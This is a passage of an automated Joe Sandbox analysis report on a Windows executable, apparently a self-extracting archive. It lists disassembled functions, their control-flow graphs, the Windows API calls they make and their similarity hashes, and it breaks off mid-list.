    control_flow_graph 725 dbb0b-dbb24 726 dbb3a-dbb3f 725->726 727 dbb26-dbb36 call e00fc 725->727 729 dbb4c-dbb70 MultiByteToWideChar 726->729 730 dbb41-dbb49 726->730 727->726 734 dbb38 727->734 732 dbb76-dbb82 729->732 733 dbd03-dbd16 call d0d6c 729->733 730->729 735 dbb84-dbb95 732->735 736 dbbd6 732->736 734->726 739 dbbb4-dbbc5 call da7ee 735->739 740 dbb97-dbba6 call e31c0 735->740 738 dbbd8-dbbda 736->738 742 dbcf8 738->742 743 dbbe0-dbbf3 MultiByteToWideChar 738->743 739->742 750 dbbcb 739->750 740->742 753 dbbac-dbbb2 740->753 747 dbcfa-dbd01 call dbd73 742->747 743->742 746 dbbf9-dbc0b call dc11c 743->746 755 dbc10-dbc14 746->755 747->733 754 dbbd1-dbbd4 750->754 753->754 754->738 755->742 757 dbc1a-dbc21 755->757 758 dbc5b-dbc67 757->758 759 dbc23-dbc28 757->759 760 dbc69-dbc7a 758->760 761 dbcb3 758->761 759->747 762 dbc2e-dbc30 759->762 763 dbc7c-dbc8b call e31c0 760->763 764 dbc95-dbca6 call da7ee 760->764 765 dbcb5-dbcb7 761->765 762->742 766 dbc36-dbc50 call dc11c 762->766 770 dbcf1-dbcf7 call dbd73 763->770 777 dbc8d-dbc93 763->777 764->770 779 dbca8 764->779 769 dbcb9-dbcd2 call dc11c 765->769 765->770 766->747 781 dbc56 766->781 769->770 783 dbcd4-dbcdb 769->783 770->742 782 dbcae-dbcb1 777->782 779->782 781->742 782->765 784 dbcdd-dbcde 783->784 785 dbd17-dbd1d 783->785 786 dbcdf-dbcef WideCharToMultiByte 784->786 785->786 786->770 787 dbd1f-dbd26 call dbd73 786->787 787->747
    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000D6AF9,000D6AF9,?,?,?,000DBD5C,00000001,00000001,62E85006), ref: 000DBB65
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000DBD5C,00000001,00000001,62E85006,?,?,?), ref: 000DBBEB
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000DBCE5
    • __freea.LIBCMT ref: 000DBCF2
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    • __freea.LIBCMT ref: 000DBCFB
    • __freea.LIBCMT ref: 000DBD20
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: 7a0cabda5998727025c03a98e0ca9f57c73e9435958b49b2fae3ccf1af978078
    • Instruction ID: 08a4bb6bae2694087b6452419547013b707c923d8b7872db2c8048c9e97be351
    • Opcode Fuzzy Hash: 7a0cabda5998727025c03a98e0ca9f57c73e9435958b49b2fae3ccf1af978078
    • Instruction Fuzzy Hash: 6051C072610316EAEB258F65CC82EBE77AAEF44760F26466AFD05D6241EB34DC408670
    Function 000DBEE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 790 dbee4-dbef8 791 dbefa-dbf03 790->791 792 dbf05-dbf20 LoadLibraryExW 790->792 793 dbf5c-dbf5e 791->793 794 dbf49-dbf4f 792->794 795 dbf22-dbf2b GetLastError 792->795 798 dbf58 794->798 799 dbf51-dbf52 FreeLibrary 794->799 796 dbf2d-dbf38 LoadLibraryExW 795->796 797 dbf3a 795->797 800 dbf3c-dbf3e 796->800 797->800 801 dbf5a-dbf5b 798->801 799->798 800->794 802 dbf40-dbf47 800->802 801->793 802->801
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,S,00000000,00000000,?,000DBE8B,S,00000000,00000000,00000000,?,000DC088,00000006,FlsSetValue), ref: 000DBF16
    • GetLastError.KERNEL32(?,000DBE8B,S,00000000,00000000,00000000,?,000DC088,00000006,FlsSetValue,000E8A00,FlsSetValue,00000000,00000364,?,000DA5D7), ref: 000DBF22
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000DBE8B,S,00000000,00000000,00000000,?,000DC088,00000006,FlsSetValue,000E8A00,FlsSetValue,00000000), ref: 000DBF30
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: S
    • API String ID: 3177248105-186050230
    • Opcode ID: b8a3762d9c74bcab84976999722b016bd2c867e4a60c83b636b224a06ffa514d
    • Instruction ID: 559fe28afadad67cb3657ff33cbe5a4227e8aec82672f63c819c8e5a4aab664d
    • Opcode Fuzzy Hash: b8a3762d9c74bcab84976999722b016bd2c867e4a60c83b636b224a06ffa514d
    • Instruction Fuzzy Hash: A701F732715322DBD7314B68EC84A5B77D8AF45BA17124631FA1AE7380CB24D800CAF0
    Function 000BAB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 803 bab40-bab61 call cffc0 806 bab6c 803->806 807 bab63-bab66 803->807 809 bab6e-bab7f 806->809 807->806 808 bab68-bab6a 807->808 808->809 810 bab81 809->810 811 bab87-bab91 809->811 810->811 812 bab93 811->812 813 bab96-baba3 call b79e5 811->813 812->813 816 babab-babca CreateFileW 813->816 817 baba5 813->817 818 bac1b-bac1f 816->818 819 babcc-babee GetLastError call bcf32 816->819 817->816 821 bac23-bac26 818->821 824 bac28-bac2d 819->824 825 babf0-bac13 CreateFileW GetLastError 819->825 823 bac39-bac3e 821->823 821->824 827 bac5f-bac70 823->827 828 bac40-bac43 823->828 824->823 826 bac2f 824->826 825->821 829 bac15-bac19 825->829 826->823 831 bac8e-bac99 827->831 832 bac72-bac8a call c1928 827->832 828->827 830 bac45-bac59 SetFileTime 828->830 829->821 830->827 832->831
    APIs
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,000B8243,?,00000005,?,00000011), ref: 000BABBF
    • GetLastError.KERNEL32(?,?,000B8243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000BABCC
    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,000B8243,?,00000005,?), ref: 000BAC02
    • GetLastError.KERNEL32(?,?,000B8243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000BAC0A
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000B8243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000BAC59
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: caea7c931718d942fa29da9b1d162e304e5fbb68e8ed158d31619fabac46e6ce
    • Instruction ID: 46f1ea93af9e9ae03945aa68294bf084e813f1e4ec48ee4409c1929f707e10af
    • Opcode Fuzzy Hash: caea7c931718d942fa29da9b1d162e304e5fbb68e8ed158d31619fabac46e6ce
    • Instruction Fuzzy Hash: FA315B30644785BFE7309F24DC45BDABBD5BB06320F100B29F9B0961D2C7B5A848CB96
    Function 000C2206 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 000C24DF: ResetEvent.KERNEL32(?), ref: 000C24F1
      • Part of subcall function 000C24DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000C2505
    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 000C223A
    • CloseHandle.KERNEL32(?,?), ref: 000C2254
    • DeleteCriticalSection.KERNEL32(?), ref: 000C226D
    • CloseHandle.KERNEL32(?), ref: 000C2279
    • CloseHandle.KERNEL32(?), ref: 000C2285
      • Part of subcall function 000C22FC: WaitForSingleObject.KERNEL32(?,000000FF,000C2419,?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C2302
      • Part of subcall function 000C22FC: GetLastError.KERNEL32(?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C230E
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 1f72b55af14e393d3a44cc143078351dc9bdd172c0a7ebb2449124b667708515
    • Instruction ID: 5ae8133f38bdc998e8658db54b2ee31ed8892300795e3fabfff5fc9b11f27b27
    • Opcode Fuzzy Hash: 1f72b55af14e393d3a44cc143078351dc9bdd172c0a7ebb2449124b667708515
    • Instruction Fuzzy Hash: C9017572400784EFD7229B64DD85FC6BBA9FB08B10F00093DF26A62560CB756954CB50
    Function 000CC748 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 870 cc748-cc761 PeekMessageW 871 cc79c-cc79e 870->871 872 cc763-cc777 KiUserCallbackDispatcher 870->872 873 cc788-cc796 TranslateMessage DispatchMessageW 872->873 874 cc779-cc786 IsDialogMessageW 872->874 873->871 874->871 874->873
    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
    • IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
    • TranslateMessage.USER32(?), ref: 000CC78C
    • DispatchMessageW.USER32(?), ref: 000CC796
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
    • String ID:
    • API String ID: 3531142305-0
    • Opcode ID: d4828ffdaf1b602a01ba8904f7758241874362212c7350875f99d151ef285da7
    • Instruction ID: 4e3a1bbf00a3e8aab01c61776e6c74bb5e87ee829624a2e78d598b5a4bd3816e
    • Opcode Fuzzy Hash: d4828ffdaf1b602a01ba8904f7758241874362212c7350875f99d151ef285da7
    • Instruction Fuzzy Hash: 32F01D71D01229AB9B249BE1DD4CEDF7FACEF493907008015B50AD2000E774E505CBF0
    Function 000CBBB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 875 cbbb0-cbbcf GetClassNameW 876 cbbf7-cbbf9 875->876 877 cbbd1-cbbe6 call c3306 875->877 879 cbbfb-cbbfe SHAutoComplete 876->879 880 cbc04-cbc06 876->880 882 cbbe8-cbbf4 FindWindowExW 877->882 883 cbbf6 877->883 879->880 882->883 883->876
    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 000CBBC7
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 000CBBFE
      • Part of subcall function 000C3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,000BD523,00000000,.exe,?,?,00000800,?,?,?,000C9E4C), ref: 000C331C
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 000CBBEE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: EDIT
    • API String ID: 4243998846-3080729518
    • Opcode ID: ea670d9a9bc87e1f9540af897223cd1f0db164dd4bebca84de53d0f7f20160b4
    • Instruction ID: 4b003d8c22bffb3f9de37a7dd065137c65eee72ff2f1539772adce87c7d4b4c7
    • Opcode Fuzzy Hash: ea670d9a9bc87e1f9540af897223cd1f0db164dd4bebca84de53d0f7f20160b4
    • Instruction Fuzzy Hash: 1FF08232600629BBDB2057A69C0AFEF76ACAB86B40F444059BA40B6184DBA4DA41C5B5
    Function 000CBD0B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 000C1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
      • Part of subcall function 000C1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    • OleInitialize.OLE32(00000000), ref: 000CBD24
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000CBD5B
    • SHGetMalloc.SHELL32(000FA460), ref: 000CBD65
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll
    • API String ID: 3498096277-3360196438
    • Opcode ID: 6d5dc9ace9ca346de89cda833ca7294de9db1cda5deddb56759b2b1bc946ea0a
    • Instruction ID: 6a049aeeb54a6d792fdd2a20e96d877cfc9560f8e9061a0b50e8216bdddcb630
    • Opcode Fuzzy Hash: 6d5dc9ace9ca346de89cda833ca7294de9db1cda5deddb56759b2b1bc946ea0a
    • Instruction Fuzzy Hash: 4DF049B1D00209ABCB10AF99D949AEFFFFCEF84304F00801AE911A2251DBB45645CBA1
    Function 000CED1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 888 ced1e-ced52 call cffc0 SetEnvironmentVariableW call c1697 893 ced54-ced58 888->893 894 ced76-ced78 888->894 895 ced61-ced68 call c17b3 893->895 898 ced5a-ced60 895->898 899 ced6a-ced70 SetEnvironmentVariableW 895->899 898->895 899->894
    APIs
    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000CED34
    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000CED70
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: 976ec165a21c1ac412d35e1bcf591e0172fc415b535a8a544719a7c9bec56587
    • Instruction ID: 599c3ef8c712d4e4352f4a95c471cf74626fa48c09ab1f3127cb1139061c9f8d
    • Opcode Fuzzy Hash: 976ec165a21c1ac412d35e1bcf591e0172fc415b535a8a544719a7c9bec56587
    • Instruction Fuzzy Hash: F1F0E5B2404274ABDB312B91DC05FFE7B9CEF26B82B044099BD46AA053E775C880C7B1
    Function 000D4D92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 900 d4d92-d4da7 LoadLibraryExW 901 d4da9-d4db2 GetLastError 900->901 902 d4ddb-d4ddc 900->902 903 d4dd9 901->903 904 d4db4-d4dc8 call d7458 901->904 903->902 904->903 907 d4dca-d4dd8 LoadLibraryExW 904->907
    APIs
    • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,000D4D43,00000000,00000001,001140C4,?,?,?,000D4EE6,00000004,InitializeCriticalSectionEx,000E7424,InitializeCriticalSectionEx), ref: 000D4D9F
    • GetLastError.KERNEL32(?,000D4D43,00000000,00000001,001140C4,?,?,?,000D4EE6,00000004,InitializeCriticalSectionEx,000E7424,InitializeCriticalSectionEx,00000000,?,000D4C9D), ref: 000D4DA9
    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,000D3BE3), ref: 000D4DD1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 2bc6f9f0acb8b03c2f4902d069a108cbf88a8bbfb8e7482e2bde5f40dfb45994
    • Instruction ID: 7f2017cfe4aa35f8c7654786ac6ca977e559546b3b404e1edd57da4a68a770e9
    • Opcode Fuzzy Hash: 2bc6f9f0acb8b03c2f4902d069a108cbf88a8bbfb8e7482e2bde5f40dfb45994
    • Instruction Fuzzy Hash: C1E0DF30A80348BBEF501F60EC46B593F9AAB10F60F100021FA0DBC5E0EBB2996095A0
    Function 000BA9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
    Download Yara Rule
    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 000BA9F5
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 000BAA0D
    • GetLastError.KERNEL32 ref: 000BAA3F
    • GetLastError.KERNEL32 ref: 000BAA5E
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: 1f51d051a8ff9d4693b0072abb4673505da0f1b4d6140610054958927b5d9329
    • Instruction ID: 5d5b7ff6e8d7dd04e6b920f3a8e5f54c8e80a8c6637e835bcab6a65dd45935c9
    • Opcode Fuzzy Hash: 1f51d051a8ff9d4693b0072abb4673505da0f1b4d6140610054958927b5d9329
    • Instruction Fuzzy Hash: 2D118B31B00204EBDF709F64DA44AEE37E9FB07760F10462AF92695290DB789E44DB63
    Function 000D4CF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • FreeLibrary.KERNEL32(00000000,00000001,001140C4,?,?,?,000D4EE6,00000004,InitializeCriticalSectionEx,000E7424,InitializeCriticalSectionEx,00000000,?,000D4C9D,001140C4,00000FA0), ref: 000D4D75
    • GetProcAddress.KERNEL32(00000000,?), ref: 000D4D7F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressFreeLibraryProc
    • String ID: ;
    • API String ID: 3013587201-2788296473
    • Opcode ID: 28ce03993095ab7e35a27305f90eaebf1e208a266c3bb5378f66f4062a89446a
    • Instruction ID: ca74144176a2445a371d7b4bd4b849ea3e23303180e5cb723466e4275169e167
    • Opcode Fuzzy Hash: 28ce03993095ab7e35a27305f90eaebf1e208a266c3bb5378f66f4062a89446a
    • Instruction Fuzzy Hash: FC119331600715AF9F26CFA4DC8099D73E6FF86B50725016AEA15DB310E730DD41CBA0
    Function 000C2337 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
    Download Yara Rule
    APIs
    • CreateThread.KERNEL32(00000000,00010000,Function_00012470,?,00000000,00000000), ref: 000C235B
    • SetThreadPriority.KERNEL32(?,00000000), ref: 000C23A2
      • Part of subcall function 000B76E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B7707
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
